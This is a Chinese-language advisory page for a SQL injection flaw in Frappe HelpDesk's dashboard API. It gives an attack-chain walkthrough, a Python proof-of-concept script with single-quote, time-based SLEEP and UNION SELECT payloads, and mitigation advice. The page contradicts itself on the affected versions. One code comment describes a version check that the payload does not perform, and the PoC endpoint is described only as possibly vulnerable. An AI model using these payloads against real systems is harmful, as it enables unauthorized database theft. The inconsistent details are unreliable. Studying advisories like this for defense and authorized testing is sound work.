CVE-2025-10655 Frappe HelpDesk SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-10655

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Frappe HelpDesk

漏洞概述

CVE-2025-10655是Frappe HelpDesk中发现的严重SQL注入漏洞，CVSS评分高达8.8，属于高危级别。该漏洞存在于Frappe HelpDesk的仪表板功能中，具体位于get_dashboard_data接口。由于程序在处理用户输入参数时采用了不安全的SQL语句拼接方式，将用户可控的参数直接嵌入到动态SQL查询中，攻击者可以通过构造恶意Payload绕过现有防护机制，进而执行任意SQL命令。成功利用此漏洞的攻击者可以窃取数据库中的敏感信息，包括客户数据、工单内容、用户凭证等，还可能通过UNION SELECT或布尔盲注等技术进一步探测数据库结构，甚至在某些配置下实现远程代码执行。该漏洞影响Frappe HelpDesk 1.14.0版本，鉴于其低攻击复杂度和高影响范围，建议受影响的用户立即采取修复措施。

技术细节

该SQL注入漏洞位于Frappe HelpDesk的dashboard模块get_dashboard_data函数中。漏洞产生的根本原因是开发者将用户控制的请求参数（如filters、fields等）直接拼接到SQL查询语句中，而未进行充分的输入验证和参数化查询处理。攻击者可以通过在HTTP请求中注入SQL特殊字符和恶意Payload，如单引号、UNION SELECT、注释符等，改变原始SQL语句的执行逻辑。在Frappe HelpDesk的RESTful API架构中，/api/v2/tickets/dashboard接口可能存在类似问题。攻击者利用该漏洞可执行以下操作：1）通过UNION注入获取其他表的数据；2）通过布尔盲注推断数据库信息；3）使用延时注入探测数据库类型；4）在某些情况下可能实现命令执行。建议通过以下方式验证漏洞：构造包含SQL特殊字符的请求参数，观察响应差异或响应时间变化。修复方案包括使用参数化查询、输入白名单验证、ORM框架安全方法等。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统使用的Frappe HelpDesk版本，确认版本为1.14.0或更早版本

STEP 2

步骤2: 认证获取

攻击者通过正常渠道获取低权限用户账户，或利用其他漏洞获取有效认证token

STEP 3

步骤3: 构造恶意Payload

攻击者构造包含SQL注入Payload的HTTP请求，常用Payload包括单引号、UNION SELECT、SLEEP()等函数

STEP 4

步骤4: 注入点识别

通过在get_dashboard_data接口的filters或其他参数中注入特殊字符，观察响应差异来确认注入点

STEP 5

步骤5: 数据提取

利用UNION注入或布尔盲注技术，逐步提取数据库中的敏感信息，如用户表、配置信息等

STEP 6

步骤6: 权限提升

通过获取的管理员凭证或其他敏感数据，进一步扩大攻击范围，可能实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-10655 SQL Injection PoC for Frappe HelpDesk
# Target: Frappe HelpDesk < 1.14.0
# Type: Time-based Blind SQL Injection

import requests
import time
import sys

TARGET_URL = "http://target-server/api/v2/tickets/dashboard"

def test_sqli_basic():
    """Test basic SQL injection with single quote"""
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <YOUR_TOKEN>"
    }
    
    # Basic test - single quote to trigger SQL error
    payload = {"filters": "name='test"}
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)
        if "sql" in response.text.lower() or response.status_code == 500:
            print("[+] Potential SQL injection detected!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

def extract_db_version():
    """Extract database version using time-based blind SQLi"""
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <YOUR_TOKEN>"
    }
    
    # Time-based blind SQL injection payload for MySQL
    # Wait for 5 seconds if database version starts with 8
    payload = {
        "filters": f"name' AND (SELECT * FROM (SELECT SLEEP(5))a) AND '1'='1"
    }
    
    start_time = time.time()
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=15)
        elapsed = time.time() - start_time
        
        if elapsed >= 5:
            print("[+] Time-based SQL injection confirmed!")
            print("[+] Database supports SLEEP function (MySQL/MariaDB)")
            return True
    except requests.exceptions.Timeout:
        print("[+] Request timeout - SQL injection confirmed!")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

def union_injection():
    """Test UNION-based SQL injection"""
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <YOUR_TOKEN>"
    }
    
    # UNION injection to extract database name
    payload = {
        "filters": "name' UNION SELECT 1,2,3,4,database(),6,7,8,9,10-- -"
    }
    
    try:
        response = requests.post(TARGET_URL, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] UNION injection might be possible")
            print(f"[+] Response preview: {response.text[:500]}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2025-10655 SQL Injection Test")
    print("=" * 50)
    
    print("\n[1] Testing basic SQL injection...")
    test_sqli_basic()
    
    print("\n[2] Testing time-based blind SQL injection...")
    extract_db_version()
    
    print("\n[3] Testing UNION-based SQL injection...")
    union_injection()
    
    print("\n[!] This PoC is for authorized security testing only")

影响范围

Frappe HelpDesk < 1.14.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）禁用或限制dashboard功能模块的访问权限；2）在Web应用层实施输入过滤，拦截SQL特殊字符如单引号、双引号、分号等；3）配置数据库防火墙规则，限制可疑查询执行；4）启用数据库查询日志实时监控；5）对所有API端点实施更严格的认证和授权控制；6）考虑使用ModSecurity等WAF工具添加临时防护规则。建议持续关注官方安全公告，及时获取最新修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-10655
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-10655
3 Details https://www.cvedetails.com/cve/CVE-2025-10655/
4 VulDB https://vuldb.com/cve/CVE-2025-10655
5 Link https://fluidattacks.com/advisories/dyango
6 Link https://github.com/frappe/helpdesk
7 Link https://github.com/frappe/helpdesk/pull/2795